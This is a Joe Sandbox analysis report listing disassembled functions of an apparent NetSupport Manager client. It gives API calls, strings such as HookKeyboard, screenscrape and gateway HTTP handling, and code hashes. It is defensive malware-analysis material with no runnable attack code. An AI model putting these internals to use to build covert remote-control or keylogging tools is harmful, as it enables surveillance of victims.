Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65

Function 1102DBC9 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31

Strings

Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102DFF4
DisableConsoleClient, xrefs: 1102DE67
client32 dbi %hs, xrefs: 1102E3C3
ts macaddr=%s, xrefs: 1102E01C
WTSFreeMemory, xrefs: 1102E061
Client, xrefs: 1102DEE5, 1102DF1D, 1102E034
ClientName, xrefs: 1102E0E5
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102E3EA
14/03/16 10:38:31 V12.10F8, xrefs: 1102E3BE
screenscrape, xrefs: 1102DF18
TSMode, xrefs: 1102DEE0
Wtsapi32.dll, xrefs: 1102DF2C
ListenPort, xrefs: 1102DF00
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102E410
WTSQuerySessionInformationA, xrefs: 1102DF9E
TCPIP, xrefs: 1102DF05
301389, xrefs: 1102E145, 1102E36C, 1102E3E1
client32.ini, xrefs: 1102DD55
MacAddress, xrefs: 1102E02F
Error x%x reading %s, sesh=%d, xrefs: 1102DDB1
, xrefs: 1102E0B5

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: $14/03/16 10:38:31 V12.10F8$301389$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 1029625771-1316599277
Opcode ID: 167fae30edd779b3003cfba29f42c4e74eef6f814957872020123381032c8382
Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
Opcode Fuzzy Hash: 167fae30edd779b3003cfba29f42c4e74eef6f814957872020123381032c8382
Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51

Function 111414A0 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 266
libraryregistryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
FreeLibrary.KERNEL32(00000000), ref: 11141563
LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
_memset.LIBCMT ref: 111415F9
LoadCursorA.USER32(00000000,00007F00), ref: 11141649
GetStockObject.GDI32(00000000), ref: 11141653
RegisterClassExA.USER32(?), ref: 1114166A
LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
#17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873

Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,461C6054,1102FCB2,00000000), ref: 1101747E
Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8

Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840

Strings

User32.dll, xrefs: 111414E7
_debug, xrefs: 11141771
InitUI (%d), xrefs: 111414CC
UI.CPP, xrefs: 11141621, 1114167C
HookKeyboard, xrefs: 11141711
riched32.dll, xrefs: 1114186E
*quiet, xrefs: 111415AD
NSMGetAppIcon(), xrefs: 11141626
imm32, xrefs: 1114157C
_License, xrefs: 111415B2
pcihooks, xrefs: 111416FD
TraceCopyData, xrefs: 1114176C
View, xrefs: 11141751
NSMWClass, xrefs: 111415D7, 11141663

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
API String ID: 3706574701-3145203681
Opcode ID: 06b0d866844079945da73f67a6a0a82cb271ec245d7bf999d025821876dd0e90
Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
Opcode Fuzzy Hash: 06b0d866844079945da73f67a6a0a82cb271ec245d7bf999d025821876dd0e90
Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55

Function 6D1C63C0 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 181
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(6D20B898,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C63E8
InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6D1C63FA
EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6412
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6D1C643B
SetLastError.KERNEL32(00000078,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6450
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6D1C646F
SetLastError.KERNEL32(00000078,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6484
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6D1C64A3
SetLastError.KERNEL32(00000078,?,00000000,?,6D1CD77B,00000000), ref: 6D1C64C5
shutdown.WSOCK32(?,00000001,?,00000000,?,6D1CD77B,00000000), ref: 6D1C64E9
GetLastError.KERNEL32(?,00000001,?,00000000,?,6D1CD77B,00000000), ref: 6D1C64F2
timeGetTime.WINMM(?,00000001,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6510
#16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6526
GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6533
timeGetTime.WINMM(?,00000000,?,6D1CD77B,00000000), ref: 6D1C6540
Sleep.KERNEL32(00000001,?,00000000,?,6D1CD77B,00000000), ref: 6D1C654B
#16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6563
closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6574
WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C657D
Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C658E
GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C659E
_memset.LIBCMT ref: 6D1C65C8
LeaveCriticalSection.KERNEL32(?,?,6D1CD77B,00000000), ref: 6D1C65D7
LeaveCriticalSection.KERNEL32(6D20B898,?,00000000,?,6D1CD77B,00000000), ref: 6D1C65F2

Strings

CloseGatewayConnection - shutdown(%u) FAILED (%d), xrefs: 6D1C64FD
InternetCloseHandle, xrefs: 6D1C6435, 6D1C6469, 6D1C649D
CloseGatewayConnection - closesocket(%u) FAILED (%d), xrefs: 6D1C65A9

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
API String ID: 3764039262-2631155478
Opcode ID: 8553bc6099e20886475e57441cfb7e1e8bd29e0dd43b802f9498621cef424bfe
Instruction ID: 150a3aa511693e4381418a55aa98df18ccb6f1b7887317bda663e1d13aa651cb
Opcode Fuzzy Hash: 8553bc6099e20886475e57441cfb7e1e8bd29e0dd43b802f9498621cef424bfe
Instruction Fuzzy Hash: 815116716443099FE7109F65CD48B7773B9BFAA318F114118E609D7299DBF8E880CBA2

Function 6D1C98D0 Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strncmp.LIBCMT ref: 6D1C996F
_strncmp.LIBCMT ref: 6D1C99A5

Strings

Error %d writing inet request on connection %d, xrefs: 6D1C9BE3
abort send, gateway hungup, xrefs: 6D1C9D2E
xx %02x, xrefs: 6D1C9AFB
Error %d sending HTTP request on connection %d, xrefs: 6D1C9D1F
Error send returned 0 on connection %d, xrefs: 6D1C9CF8
CMD=NC_DATA, xrefs: 6D1C999F
NC_DATA, xrefs: 6D1C9969
%s, xrefs: 6D1C9AAA
SendHttpReq failed, not connected to gateway!, xrefs: 6D1C9934, 6D1C9B79
3', xrefs: 6D1C9CB2
%02x %02x, xrefs: 6D1C9AE7

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
API String ID: 909875538-2848211065
Opcode ID: 9cd674f17899834245a98cde44ab10a05477c15b955cb154e5f8b738067df387
Instruction ID: c35e5f2b78db87f94c2d2d35394ebc6e2eb4026d3ba70a6673d74566c6e4fd6c
Opcode Fuzzy Hash: 9cd674f17899834245a98cde44ab10a05477c15b955cb154e5f8b738067df387
Instruction Fuzzy Hash: 45D15971A042199FDB20CF64CC94BEAB7B4AF2A30DF0140D9E90D9B249D7B9D985CF52

Function 110285F0 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,73F71370,?,0000001A), ref: 110286DD
_strrchr.LIBCMT ref: 110286EC

Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B

Strings

AssistantName, xrefs: 11028A8C
AssistantURL, xrefs: 11028AB9
NSSLongCaption, xrefs: 11028B55
SupportsChrome, xrefs: 11028AE6
ShortName, xrefs: 110288A5
NSSTLA, xrefs: 11028965
Name, xrefs: 1102883E
NSMAppDataDir, xrefs: 110289F5
SupportsAndroid, xrefs: 11028B82
NSSConfName, xrefs: 11028A55
SupportWWW, xrefs: 11028995
SupportEMail, xrefs: 110289C5
TechConsole, xrefs: 11028B1D
\, xrefs: 1102866C
product.dat, xrefs: 110286A0, 110286F1
Home, xrefs: 110288D5
??F, xrefs: 11028C70
NSSName, xrefs: 11028935
??I, xrefs: 11028CF7
TLA, xrefs: 11028905
LongName, xrefs: 11028875
NSSAppDataDir, xrefs: 11028A25

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: FileModuleName__stricmp_l_strrchr
String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
API String ID: 1609618855-357498123
Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52

Function 6D1D6BA0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 273sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 6D1D6BD5
GetTickCount.KERNEL32 ref: 6D1D6C26
Sleep.KERNEL32(00000064), ref: 6D1D6C5B

Part of subcall function 6D1D6940: GetTickCount.KERNEL32 ref: 6D1D6950

WaitForSingleObject.KERNEL32(0000030C,?), ref: 6D1D6C7C
_memmove.LIBCMT ref: 6D1D6C93
select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6D1D6CB4
Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6D1D6CD9
GetTickCount.KERNEL32 ref: 6D1D6CEC
_calloc.LIBCMT ref: 6D1D6D76
GetTickCount.KERNEL32 ref: 6D1D6DF3
InterlockedExchange.KERNEL32(01713032,00000000), ref: 6D1D6E01
_calloc.LIBCMT ref: 6D1D6E33
_memmove.LIBCMT ref: 6D1D6E47
InterlockedDecrement.KERNEL32(01712FDA), ref: 6D1D6EC3
SetEvent.KERNEL32(0000031C), ref: 6D1D6ECF
_memmove.LIBCMT ref: 6D1D6EF4
GetTickCount.KERNEL32 ref: 6D1D6F4F
InterlockedExchange.KERNEL32(01712F7A,-6D20A188), ref: 6D1D6F60

Strings

FALSE, xrefs: 6D1D6E67
ProcessMessage returned FALSE. Terminating connection, xrefs: 6D1D6F25
ResumeTimeout, xrefs: 6D1D6BBA
httprecv, xrefs: 6D1D6BDD
ReadMessage returned FALSE. Terminating connection, xrefs: 6D1D6F3A
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6D1D6E62

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
API String ID: 1449423504-919941520
Opcode ID: 36f838d5c6901acd6d1c9feed0cdcbd10bc95e07c2061b2e7cc74252121e46a4
Instruction ID: f2195fba641d69a1e3fbe74b88e4dd72737b062e9b435738f43ca27a29c32769
Opcode Fuzzy Hash: 36f838d5c6901acd6d1c9feed0cdcbd10bc95e07c2061b2e7cc74252121e46a4
Instruction Fuzzy Hash: 4CB1C2B1D4425C9BDB20DF64CD48BEAB3B4EB59348F0140DAE649A7248D7F49AC0CFA1

Function 11086700 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
LoadLibraryA.KERNEL32(?), ref: 110867EC
GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860

Strings

CryptPak.dll, xrefs: 1108675B, 110867BE
CipherServer_DecryptBlocks, xrefs: 1108686B
CipherServer_CloseSession, xrefs: 11086849
CipherServer_OpenSession, xrefs: 11086838
CipherServer_Destroy, xrefs: 11086816
CipherServer_GetRandomData, xrefs: 1108687C
CipherServer_GetInfoBlock, xrefs: 11086827
CipherServer_ResetSession, xrefs: 1108688D
CipherServer_EncryptBlocks, xrefs: 1108685A
CipherServer_Create, xrefs: 11086801

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$FileModuleName
String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
API String ID: 2201880244-3035937465
Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50

Function 11141890 Relevance: 35.7, APIs: 3, Strings: 17, Instructions: 672registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 1114194A

Strings

Chg [%s]%s=%s, xrefs: 11141EF5
Info. Lockup averted for AD policy changes, xrefs: 11141B1D, 11141B44
_debug, xrefs: 11141DE6
Warning. Can't calc AD policy changes, xrefs: 11141D85
NSM.LIC, xrefs: 11141950
Client, xrefs: 11141DCC, 1114207F
RoomSpec, xrefs: 11141DC7, 1114207A
client, xrefs: 11141D63
Add [%s]%s=%s, xrefs: 11141E36
client., xrefs: 11141D46
TracePolicyChange, xrefs: 11141DE1
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 111420C8
Info. Policy changed - re-initui, xrefs: 11142012
NSA.LIC, xrefs: 1114195F, 11141966, 1114198D
Del [%s]%s=%s, xrefs: 11141E95
Info. Policy changed - reload transports..., xrefs: 11142036
IsA(), xrefs: 111420CD

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: Close
String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 3535843008-2062829784
Opcode ID: 9735336a69bbdc274ed53a66040cb7ee1bfed29be017be3f96cc698dd169788a
Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
Opcode Fuzzy Hash: 9735336a69bbdc274ed53a66040cb7ee1bfed29be017be3f96cc698dd169788a
Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51

Function 110281A0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1

Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E

wsprintfA.USER32 ref: 11028214
WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
wsprintfA.USER32 ref: 11028291
CloseHandle.KERNEL32(?), ref: 110282A7
CloseHandle.KERNEL32(?), ref: 110282B0
LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325

Strings

", xrefs: 110281EA
pcicl32_res.dll, xrefs: 110282E9
\GetUserLang.exe", xrefs: 1102820E
Locales\%d\, xrefs: 11028281
SetClientResLang called, gPlatform %x, xrefs: 110281BC
NSM.LIC, xrefs: 110281B9, 110282D0
